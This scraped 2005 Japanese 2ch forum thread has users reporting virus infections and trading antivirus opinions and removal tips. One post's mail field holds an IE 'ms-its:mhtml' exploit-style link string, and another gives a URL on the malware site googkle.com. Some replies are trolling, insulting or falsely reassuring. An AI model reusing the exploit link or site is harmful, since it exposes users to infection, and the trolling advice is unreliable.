洒落か？洒落にしてはヘタクソだな
784 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/24(日) 21:15:33 ]: >>770
769です。ノートン入れたら全て削除できました。
巷で話題のウイルスバスターはもう使いませんｗｗ
785 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 00:31:14 ]: ウイルス対策ソフトの検出力調査結果
www.geocities.jp/stealrush/security.html
786 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 02:09:47 ]: >>785
そこなんでvirus.grだけの結果を強調してあるの?w

*模範解答
　都合がいいから
787 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 02:10:08 ]: www.canon-sol.co.jp/security/v_b/pdf/01_VB_Jun03_VBJP.pdf ７/12ページ
www.canon-sol.co.jp/security/v_b/pdf/03_VB_Aug03_VBJP.pdf　７／１２ページ
www.canon-sol.co.jp/security/v_b/pdf/09_VB_Feb04_VBJP.pdf　７／１２ページ

１位　NOD32　(激軽、激速)

２位　カスペ

３位　マカフィー　(普通)

４位　ノートン　(重い)

～～～～～～～～～～～～～

最下位　　ウイルスバスター（ＣＰＵ使用率１００％）
788 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 02:32:01 ]: >>787
Eset NOD32　　　　 0 100.00% 0 100.00% 100.00% 0 100.00% 0 100.00% 0 100.00%
Kaspersky KAV　　 0 100.00% 0 100.00% 100.00% 0 100.00% 1 99.92% 0 100.00%
789 名前：名無しさん＠お腹いっぱい。 [2005/04/25(月) 16:56:36 ]: nyやってたらやたらウィルスに感染してるみたい。
ノートンでスキャンしてるから大丈夫だと思ってたら、
タスクマネージャに
iexplore.exe・ezSP_Px.exe・csrss.exe・NAVAPSVC.EXE・PDVDServ.exe・rundll.exe
などのウィルスがありました。
【使用OS】 XPSP2
【WindowsUpdateしてるか】してるが最近更新がない
【AntiVirusは何を使っているか】ノートン、Spybot、Ad-aware
【ちゃんとUpdateしてるか】スキャン前に
【スキャンした結果（ウイルス名・発見場所）】
パソコンA・ノートン＆Spybotなし、Ad-aware未チェック
パソコンB・ノートンなし、spybot ２つ（何かは忘れたが削除）
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】どちらのパソコンにも上記の.exeがあり（他にも多数の.exe)
パソコンBにはリモートアクセスあり
【何をしたらそんなことになったのか】おそらくzip解凍
【これまでにとった措置】スキャン
【その他の質問】たすけて
790 名前：789 [2005/04/25(月) 16:57:00 ]: すみません。自己解決しました。
791 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 16:57:40 ]: >>789
＞nyやってたら
ﾀﾞｳｿ板へ(・∀・)ｶｴﾚ!
792 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 16:58:10 ]: >>790
市ね
793 名前：790 ◆NPjWSW9EXI [2005/04/25(月) 17:00:14 ]: >>790
自己解決してませんよ
794 名前：789 ◆NPjWSW9EXI [2005/04/25(月) 17:00:46 ]: お願いします
795 名前：名無しさん＠お腹いっぱい。 [2005/04/25(月) 17:01:48 ]: >>789
>nyやってたらやたらウィルスに感染

自業自得
796 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 17:03:08 ]: ◆NPjWSW9EXI、お帰りはこちらtmp4.2ch.net/download/
797 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 17:07:32 ]: www.google.com/search?q=%E2%97%86NPjWSW9EXI&hl=ja&lr=&start=20&sa=N&filter=0
798 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 19:14:09 ]: >>789
ウイルスだって。。。。
検索ぐらいしろよ
799 名前：名無しさん＠お腹いっぱい。 [2005/04/25(月) 19:16:32 ]: ここまでアホな釣りかたもあったものだな

>>789
ウイルスだから、ファイルを見つけてすべて消した方が良いよ。
800 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 21:14:02 ]: ※緊急※　ウイルスバスターに続いて、NOD32で二度目の大きな不具合発生です。

NOD32をWindows Server 2003で使っているユーザーの方へ。
sp1をあてると通信不能となり、最悪の場合リブートの繰り返しとなります。気をつけて下さい。
開発元が現在対策中です。
ttp://canon-sol.jp/supp/nd/wndt4210.html

※過去（約1年前）の大きな不具合
●NOD32にレジストリを破壊してOS再インストールが必要になる重大バグが発生。
・Windows シャットダウン時にブルースクリーンになる問題
・登録済みのアプリが強制抹消される問題
ttp://canon-sol.jp/product/nd/v20008.html
801 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 21:31:11 ]: Windows Server 2003津かっって無いから関係無ーや
802 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 21:51:24 ]: まあ、今回のウイルスバスター騒動とは根本的に質が違う罠。
ＳＰを検証無しで入れようとするのはタダのアフォだが、パターンファイルはいちいち検証して入れるものでもないし。

社員必死だなｗ
803 名前：名無しさん＠お腹いっぱい。 [2005/04/25(月) 22:32:44 ]: pcweb.mycom.co.jp/news/2003/02/20/10cl.jpg
804 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/25(月) 23:08:10 ]: >>802
禿堂。灰汁の秘密結社TM党員の活躍に期待汁！
805 名前：789 ◆NPjWSW9EXI [2005/04/26(火) 01:34:38 ]: ノートンでも未検出で、ウィルスバスターのオンラインスキャンでもウィルス未検出だった。
806 名前：名無しさん＠お腹いっぱい。 [2005/04/26(火) 02:38:05 ]: >>805
未検出ならウイルスは無いって事だろ
頭大丈夫か？

つかﾀﾞｳｿ板で聞けよ
807 名前：789 ◆NPjWSW9EXI [2005/04/26(火) 03:08:53 ]: >>806
はぁ？アホか？
そこまでウィルスソフト信用するなんておめでたいやつだなｗｗｗ
Ctrl＋Alt＋Deleteでタスクマネージャー見てみろ
おまえのPCは知らないexeファイルがうようよ活動してるよｗｗｗ
おまえの個人情報は筒抜けってわけさ、なぁたつやくん
808 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/26(火) 03:31:37 ]: ウヨウヨしてんのはお前のPCなんだが
809 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/26(火) 03:39:48 ]: じゃあサヨサヨしてるのは誰のPC？
やっぱこれも>>789のPCか
810 名前：名無しさん＠お腹いっぱい。 [2005/04/26(火) 05:15:35 ]: >>789 みたいな池沼は放って置けよ
811 名前：名無しさん＠お腹いっぱい。 [2005/04/26(火) 06:49:35 ]: ＥＸＥをググったトップの情報がウイルスだからって
ウイルスと勘違いしてる無知どもワロス
812 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/26(火) 13:43:48 ]: EXE　ファイル　捨てたい
813 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 00:23:31 ]: >>789にあるiexplore.exeってウイルスやスパイソフトか？
814 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 00:31:59 ]: 【使用OS】：ＸＰ　Pro
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウイルスバスター05
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】 TROJ_SMALL.X C:\WINDOWS\SYSTEM32
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】上記のウィルスを検出したのですが駆除できません。
【何をしたらそんなことになったのか】記憶にないがウィルスの情報を見る限りどこかで安易にはいを押した可能性が高い

【これまでにとった措置】セーフモードでのスキャン、
システムの復元を無効、
Administerでのトレンドマイクロダメージクリーンナップサービスの実行
トレンドマイクロに書いてあった手動削除、など

【その他の質問】
815 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 00:32:42 BE:26320043- ]: >>813
実行してみれば分かる
816 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 01:00:02 ]: >>814
セーフモードでバスター走るかなぁ？まぁいいけど…

ご参考までに
教えてgoo!　TROJ_SMALL.Xと32re4.dll
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1325308
817 名前：814 mailto:sage [2005/04/27(水) 01:14:24 ]: >>816
レスありがとう。
gggYe.dllってファイルが感染してるみたいなんだけど、タスクマネージャのプロセスに「gggYe.dll」って出るってこと？
それが出ないからプロセスどれ終了させて良いのかわからないんよ。
クリーンアップしても駄目だったし…＿|￣|〇
818 名前：名無しさん＠お腹いっぱい。 [2005/04/27(水) 01:27:22 ]: セーフモードでそのDLLを手動削除
819 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 02:22:53 ]: >>817
名前からしてまともなdllじゃないな
820 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 07:15:51 ]: >>815
スパイソフトなら取り返しがつかない。
821 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 08:14:28 ]: Windows XP SP1などでも「MS05-019」適用後にネットワーク関連の不具合
ttp://internet.watch.impress.co.jp/cda/news/2005/04/26/7439.html
822 名前：名無しさん＠お腹いっぱい。 [2005/04/27(水) 23:06:23 ]: 【使用OS】win XP
【WindowsUpdateしてるか】たまにしかしていない
【AntiVirusは何を使っているか】Norton
【ちゃんとUpdateしてるか】たまにしかしていない
【スキャンした結果（ウイルス名・発見場所）】名→W32.Whiter.Trojan
発見場所→gra2.exe(?)
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】今のところは無いが、再起動したら
全てのファイルが削除されるとの話
【何をしたらそんなことになったのか】知人に薦められたエミュなるものをを探してみたときに、
リンクを踏んだら警告が出た
【これまでにとった措置】 Nortonでスキャン

駆除方法に
このトロイの木馬を駆除するには、W32.Whiter.Trojanとして検出されたファイルをすべて削除し、
レジストリに追加された値を削除する必要があります。

って書いてあるんですが、無かったら安心していいんですか？
823 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/27(水) 23:18:15 BE:17546742-#]: >>822
超安心
824 名前：814 mailto:sage [2005/04/28(木) 00:36:23 ]: セーフモードでもｄｌｌ削除できない…
Windows再ｲﾝｽｺしか手はないのか…
825 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 00:47:18 BE:59219093-#]: >>824
DOS起動DISKがあるじゃないか。
826 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 00:53:39 ]: >>824
WindowsXPで消せないファイルを削除するTips集
ttp://xp-delete.hp.infoseek.co.jp/tips.html
827 名前：814 mailto:sage [2005/04/28(木) 02:31:31 ]: なんとか削除できた
おまいら本当にありがとう
828 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 11:29:40 ]: >>827
You're welcome.
829 名前：名無しさん＠お腹いっぱい。 [2005/04/28(木) 13:50:44 ]: age
830 名前：名無しさん＠お腹いっぱい。 [2005/04/28(木) 15:22:27 ]: あげ
831 名前：名無しさん＠お腹いっぱい。 [2005/04/28(木) 17:10:47 ]: Googkle.com
832 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 18:58:17 ]: タスクマネジャーにsvchosts.exeが4つ出てるんですがなぜですか？
833 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 19:11:52 ]: F-Secure ウイルス情報
ttp://www.f-secure.co.jp/v-descs/v-descs3/googkle.htm

>F-Secureは、本件について当局に報告しました。

どこの「当局」に通報したんだろう？
834 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 19:21:19 ]: >>832
svchost.exeならいくつかあって普通だが
svchosts.exeならウィルスだったような
835 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 19:25:51 ]: svchost.exeでした！アドバイスありがとうございました！
836 名前：名無しさん＠お腹いっぱい。 [2005/04/28(木) 21:10:48 ]: 【使用OS】 2K SP4
【WindowsUpdateしてるか】 Yes
【AntiVirusは何を使っているか】無　　ウィルスバスターのオンラインスキャンのみ
【ちゃんとUpdateしてるか】無
【スキャンした結果（ウイルス名・発見場所）】 RBOT.GEN　　ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.GEN
　　　　　　　　　　　　　　　　　　　　　　 C:\WINDOWS\SYSTEM32\ntlmssr.exe
【別のオンラインスキャンしたならその結果は】シマンテック・マカフィにて検出されず・Pandaで同じのが検出される。
【症状を具体的に、分かる限りすべて書く】今の所異常は無し。（気づいてないかも・・）
【何をしたらそんなことになったのか】理由が思い当たらないです・・
【これまでにとった措置】
【その他の質問】これが本題なんですが、↑の場所を探してもそのexeが見つからないんです。　なんか不気味で・・放置でいいんですかね・・？？
SYSTEM32の中で検索してもそれらしいファイルがありませんでした・・。
837 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 21:27:32 ]: >>836
Windows 95/98/98/98SE/Me/2000/XP - 隠しファイルやフォルダを表示する方法
ttp://www-6.ibm.com/jp/domino04/pc/support/Sylphd02.nsf/jtechinfo/SYJ0-0295AD6
838 名前：836 mailto:sage [2005/04/28(木) 21:35:39 ]: >>837
すいません、隠しファイルは表示して探しました・・　記述不足でしたorz
839 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 21:44:27 ]: >>838
ウイルス情報の詳細ページに書いてあるレジストリに、不審なファイル名が登録されていないかチェック。
840 名前：836 mailto:sage [2005/04/28(木) 21:51:18 ]: >>839
とりあえず詳細のウィルス名のようなレジストリは登録されてませんでした。
841 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 21:53:58 ]: >>840
稼働してるサービスやプロセスをチェックして、怪しいものが無ければ誤検出って可能性もあるな。
ただ、Pandaとトレンドマイクロの２社で検出されてるのが引っかかるが・・・。
842 名前：836 mailto:sage [2005/04/28(木) 22:05:37 ]: そんなに怪しいのは見当たらないですね・・。　svchost.exeが４つある以外は( ﾟдﾟ)
後、･w･.exeつーのが・・・
843 名前：836 mailto:sage [2005/04/28(木) 22:07:05 ]: ぁ、少し上にありましたね。ｽﾏｿ＜svchost
844 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 22:17:45 ]: >>842
svchost.exeは普通に使ってても複数立ち上がるのは珍しくないけど・・・
もう一つは怪しすぎｗ＞･w･.exe
とりあえずどこにあるかパス調べてみ。
心当たりのあるフォルダ（Program Filesの特定のアプリケーションフォルダなんかの下）じゃなくて、
システムディレクトリ直下とかにあったら怪しさ倍増。

あとはぐぐるか、ウイルスチェックソフトの機能無制限で使える期間限定体験版とかつかってチェックしてみれ。
845 名前：836 mailto:sage [2005/04/28(木) 22:22:30 ]: >>844
ぁ、心当たりあるヤツでした・・。

ありがとうございました。　とりあえず怪しい動きもしてないようなので放置しておきます。少々不気味ですが・・
846 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/28(木) 22:25:56 ]: |дﾟ)
847 名前：名無しさん＠お腹いっぱい。 [2005/04/29(金) 01:34:05 ]: 【使用OS】 me(サブ
【WindowsUpdateしてるか】とりあえずは
【AntiVirusは何を使っているか】サブなのでなんも入ってない
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】　トレンドマイクロ(6)再起動後シマンティック(0)
【症状を具体的に、分かる限りすべて書く】今のところ無い
【何をしたらそんなことになったのか】 googkleを踏んだ
【これまでにとった措置】ﾉｰﾄﾝの体験版を入れた
【その他の質問】再起動したらウイルスが消えたんですがどこに行ったんでしょ
848 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 01:51:55 BE:78959849-#]: >>847
ノートンから見えない位置
849 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 01:55:20 ]: >>848
具体的にどうすれば削除できるか教えてくださいorz
850 名前：名無しさん＠お腹いっぱい。 [2005/04/29(金) 01:59:56 ]: 【使用OS】 XP SP1
【WindowsUpdateしてるか】現在利用できず
【AntiVirusは何を使っているか】 norton AntiVirus2003
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】発見されず
【別のオンラインスキャンしたならその結果は】　
【症状を具体的に、分かる限りすべて書く】 Windows Updateが利用できない。microsoftのHPにもアクセスできず
【何をしたらそんなことになったのか】メール添付されたファイルを開いてしまった
【これまでにとった措置】当初はノートンのupdateも利用できなかったがググッて見たところ同じ症状の解決方法が掲載されてるHPがあったためそれに従いウイルスに書き換えられた箇所を修正すると改善された。
【その他の質問】

どこか書き換えられたと思うのですがさっぱりわかりません・・
851 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 02:06:21 BE:39479292-#]: >>850
添付開いちゃいろんな意味でおしまい。
852 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 03:13:34 ]: >>850
添付開いちゃいかんわな。
リカバリーしとけ。
853 名前：名無しさん＠お腹いっぱい。 [2005/04/29(金) 08:55:53 ]: 【使用OS】 xp
【WindowsUpdateしてるか】自動更新
【AntiVirusは何を使っているか】ﾉｰﾄﾝｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ 2004
【ちゃんとUpdateしてるか】今みたらしてませんでした。
【スキャンした結果（ウイルス名・発見場所）】今現在は検出されませんでした。
削除したウイルスはMHTML Redir.Exploitというウイルスです。
【別のオンラインスキャンしたならその結果は】してません。
【症状を具体的に、分かる限りすべて書く】なんとなく重くなったような…
【何をしたらそんなことになったのか】 www.googkle.com/info/info_0504228.htm
を踏んでしまいました。
【これまでにとった措置】一応ﾉｰﾄﾝが反応してくれて削除してくれました。
【その他の質問】
踏んだスレの後のほうのレスでパソコンが乗っ取られるとなっていて不安でたまりません。
854 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 09:29:47 ]: >>853
もう一度ノートンでスキャン、他の会社のオンラインスキャン、あとSpybot、Ad-awaweなどでスパイウェアのスキャン、
ewido、SwatItなどのトロイ駆除ソフトでもスキャン…かな…
855 名前：名無しさん＠お腹いっぱい。 [2005/04/29(金) 11:24:51 ]: ウイルスバスターでスキャンしましたが検出されませんでした。
スパイウェアは問題箇所が１８見つかったのですが全部削除。
これで大丈夫でしょうか？不安です…
856 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 11:56:45 BE:21933252-#]: >>855
安心
857 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 12:19:53 ]: 本当ですか？！
安心しました。ありがとうございます！
858 名前：８５７ mailto:sage [2005/04/29(金) 12:21:40 ]: あ、ちなみに
853＝855＝857です。
859 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 16:54:42 ]: もはや、検出ソフトだけに頼っていてもスパイウェアは全部発見出来ない。

検出には、Ad-Aware SE Personal、Spybot - Search & Destroyで十分。
変な物をそもそも入れられないように、ie-spyadとSpywareBlasterで制限付きサイトに免疫登録

だけど、インストールされちまったら、
スパイウェアの親玉インストーラーファイルは、
そもそも何を使っても検出しないから、
タスクマネージャのプロセスタブで日頃から起動中のものは全部把握しておく。

www.sysinternals.com/ntw2k/freeware/procexp.shtml
Process Explorer
これを使って、ぶら下がっているプロセスや使用するファイルなどを把握しよう。

レジストリ内も全部読めれば完璧なんだけどね。
860 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 17:04:47 ]: 誤爆？
861 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 17:17:21 ]: どこが？
862 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 17:35:30 ]: >>860は頭が（ｒｙ
863 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 18:15:15 ]: 【総合】スパイウェア予防駆除 Part7
pc8.2ch.net/test/read.cgi/sec/1111917202/

貼るならこっちな。駆除法なんて書かなくてもいい。
スパイウェアが見つかるようなザルにしとくなよってこった。
864 名前：858 [2005/04/29(金) 22:16:59 ]: >>863
まだ不安でリンク先にいったらまた感染してしまった…
Bloodhound.Exploit.6とゆうやつですが、
ノートンがアクセス拒否。どうしたらいいでしょうか。
もうどうしていいか分かりません…
865 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 22:26:28 ]: >>864
マカフィーにすればいいだけ
866 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 22:26:49 ]: >>864
ノートントラップだな。
867 名前：858 [2005/04/29(金) 22:38:39 ]: とゆうことは、
このまま無視しても大丈夫ってゆうことですか？
868 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 22:52:16 ]: アドバイスをお願いします。

【使用OS】 winXP　SP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウィルスバスター2005
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】
c:\windows\system32\hwclock.exe
ウィルス名　BKDA SDBOT.GAA

【別のオンラインスキャンしたならその結果は】
試していません

【症状を具体的に、分かる限りすべて書く】
ネットに接続したらいきなりウィルスバスターがウィルスを検知し、ウィンドウが出ました。
ウィルス感染ファイルを隔離できなかったので手動で処理してください
と、メッセージがでました。
感染ファイルが時間に関係しているためか、一定時間（10秒おき？）くらいの間隔でウィルスを検知していきます。

【何をしたらそんなことになったのか】
ネットに繋いだ瞬間
【これまでにとった措置】
システムの復元　→　復元後、ネットに繋いだ瞬間にまた感染されました。
hwclockファイルの隔離　→　検索してもこのファイルを見つけられませんでした。
【その他の質問】
サポートには後日電話で問い合わせたいと思います。
ただ、上記ファイルをどうにかする問題で済むのでしたら、
対処法をお願いします。
869 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 23:01:11 ]: >>868
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.GAA

ここ見てレジストリの編集までやれば改善されるのでは？
870 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/29(金) 23:29:52 ]: >>869
あれ、そのようなページがあったんですね・・・。
親切な回答ありがとうございました。
確認してみます。
871 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 05:16:04 ]: >>864
せめてスレ内くらいは検索しろ。
そうゆうクセ付けないといつまでも感染するぞ。
Exploit.6でスレ内検索してみれ。
872 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 05:57:00 ]: 【使用OS】 XP HomeEdition　IE6.0 SP2
【WindowsUpdateしてるか】 YES
【AntiVirusは何を使っているか】 NIS2004
【ちゃんとUpdateしてるか】 Yes
【スキャンした結果（ウイルス名・発見場所）】ウイルスは無し
【別のオンラインスキャンしたならその結果は】してません。
【症状を具体的に、分かる限りすべて書く】ＮＩＳがTrojan.Anicmooを検出、削除できずアクセスを拒否
【何をしたらそんなことになったのか】あるリンク先のHPを見た時
【これまでにとった措置】 (掲示板管理人なので)リンク先を削除、
ノートンのHPでLiveUpdateすればいいと書いてあったので、LiveUpdateとIntelligent Updaterを使用後
セーフモードでAdminisratorと私個人の両方でウイルススキャン(NIS)、その後ついでにSpyBot.Ad-Awareでもスキャンしました。
【イマイチ不明な点】
ウイルス発見時にウイルスを検出、削除できないと書かれ不安ですが、
その後アップデートしてスキャンすれば検出されないのも意味不明に感じます。
ウイルスを削除できないままこのまま放置していいのでしょうか？
【その他の質問】
ウイルススキャン時はセーフモードでAdminisrator(約10万ファイル)と私個人(約30万ファイル)の両方でウイルススキャン(NIS)していますが、
これを簡素化できるものならば簡素化したいです。
片方だけで十分であるとか、パソコン内にファイルを保存しなければ(HPを閲覧しただけでは)、
画像、動画、テキストファイル(これが１００GB以上あります)を省略してスキャンすればいいとか
簡素化しても問題なければ簡素化したいので教えて下さい。
873 名前：872 [2005/04/30(土) 05:59:46 ]: スミマセン。
HPを閲覧してNISのAutoProtectのメッセージでは
ＮＩＳが「Trojan.Anicmooを検出、修復できません。アクセスが拒否されました。」です。
情報の小出しになってしまい申しわけ御座いません。
874 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 06:13:14 ]: >>872
めんどくせえよなあ
プライベートフォルダの設定をやめればいいだけ
プライベート設定するならば、Homeだろうから、
セーフモードで起動して、セキュリティタブ
せめてsystemのアクセス権だけは、
ユーザーフォルダにフルコントロールで設定する
875 名前：872 [2005/04/30(土) 06:21:20 ]: >>874さん
有り難う御座います。
Trojan.Anicmooの方はどうなのでしょうか？
876 名前：872 [2005/04/30(土) 06:22:29 ]: 私個人の方だけスキャンすればいいのですね？
またスキャンファイルは省略可能でしょうか？
877 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 06:31:28 ]: >>872
失礼　通常プライベート設定してもsystemのフルコントロールは外れないね
間違い
発見されたフォルダが何処だったのかが問題だが、
Temporary Internet Filesだと思う
ノートンのAuto Protectが実行を阻止しなければいけないんだが、
出来損ないだからIEが実行までしてしまう
そのためにアクセス拒否されている
これが正解かな？
878 名前：872 [2005/04/30(土) 06:37:47 ]: >>877さん有り難う御座います。
という事はIEまでは実行されているけどウイルスを拒絶しているので
ウイルスはパソコン内部に入りこんでいない。
だから内部をスキャンしても見つからない。
すなわち心配しなくても大丈夫
と受け取っていいのですね？
879 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 06:38:31 ]: >>872
今後検出されて削除する場合は、
IEの窓を全部閉じてから実行しましょう
880 名前：872 [2005/04/30(土) 06:39:25 ]: >>879
はいそうします。
881 名前：872 [2005/04/30(土) 06:47:36 ]: >>874 >>877 >>879さん
質問に答えて頂き有り難う御座いました。
882 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 06:49:14 ]: ３人は同一人物とｵﾓ・・
883 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 08:07:21 ]: 2ちゃんねらーはレスの数だけ人格がある。
884 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 09:43:02 ]: OSwindows2000のノートパソコンなのですが、ブラウザの上（戻る進む中止ボタンのある部分）
と↓（スタートボタンや時刻が表示されるところ）の二つの部分だけが
激しく上下に波打つようになりました・・・普通の画面の部分は綺麗に見える
のですが、これは液晶の故障なのかなにか、ウィルスのようなものなのか
もしこのような症例のウィルスしってるかたいらしたらお助けください。
885 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 09:51:24 ]: Default Block Ultor's Trojan horse　
インターネットワームを検出して遮断しました。とメッセが出ました。
先日ノートンとa2でスキャンしても検出されなかったので安心してたのですが
すいません全く知識がないです･･･
886 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 10:11:11 ]: 何のウィルス対策もせず専ブラで２ｃｈしてたら急にＴａｂを押し続けてる状態になり
書き込みしようとするとカーソルがあちこち移動、１とかあとか勝手に入力、上に別入力のウィンドウが開く
ＩＥを使用する時に情報が他の人に読み取られる可能性がありますて出る
キーボードのキーがおかしい。
無料ウィルスチェックをすると
c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\Logs\2ch\ネット関係\Download\1112640090.dat は　Unix.Penguin に感染しています。
というのが8個でました・・・。
初心者で何の対策もしていない自分が悪いのですが・・・どうか対処法をお願いします
887 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 12:12:54 ]: >>884
ＯＥの場合でも同じ症状？
おそらくディスプレイの故障だと思われ。

>>885
遮断したんなら問題ないかと。

>>886
ttp://www.symantec.com/region/jp/avcenter/venc/data/unix.penguin.html
ここ見て理解できなかったら潔くノートン買う。
888 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 12:15:37 ]: >>886
ウイルス対策しないで2chを専ブラで見るなんて向こう見ずなナメクジですね。
アンチウイルスソフト入れた方がいいと思います。
889 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 15:56:09 ]: >>887
ありがとうございます。何とかシマテックでウィルスチェックやったのですが駆除の仕方は
やはり理解できませんでした・・・スクリプトとか何が何だか・・・
>>888
そうなんです・・・何も知らずに使い勝手のいい専ブラ使って・・・
初心者向けなアンチウイルスソフトあったら是非教えて下さい。
貧乏臭いですが体験版を・・・
ＯＳはＭｅでＰＣ自体がヘボすぎて容量少ないです。
890 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 16:01:55 ]: 時に物凄い破壊力を発揮するNOD32とか
891 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 16:33:46 ]: あげ
892 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 16:55:47 ]: ＞＞887
レスありがとうございます
OEでも同症状だったのだですが、ディスプレーのモニタドライバを
最新のものにしたところ、ぴったり収まりました。
液晶の故障を最悪考えましたがとりあえずホッとしてます・・・
また、波打ったらどうしようかびびってますが
893 名前：名無しさん＠お腹いっぱい。 mailto:ms-its:mhtml:file://c: [2005/04/30(土) 20:39:45 ]: 　
894 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 23:10:13 ]: ＸＰを使ってupdateもやってます。
ウイルスセキュリティやウイルスバスターで検査すると
場所はC\windows\syatem32\msdtctmdrv.exeにて
Trojan.HLLW.Antinny.lに感染しているが隔離、削除できません
どなたかお助けを・・・
895 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/30(土) 23:15:09 ]: >>894
ttp://www.symantec.com/region/jp/sarcj/data/t/trojan.upbit.html
注意: 2004 年 5 月 23 日以前のウイルス定義は、この脅威を W32.HLLW.Antinny.L として検出します。
896 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 23:46:09 ]: ノートンでも削除出来なかったウイルスかスパメール？があったのですが、ｐｃ捨てたほうが良いの？
897 名前：名無しさん＠お腹いっぱい。 [2005/04/30(土) 23:49:45 ]: >>896
再インスコで桶
898 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 00:59:54 ]: >>894
ﾀﾞｳｿ厨は巣に(・∀・)ｶｴﾚ!!
899 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 01:12:32 ]: 【使用OS】windowsXPsecond
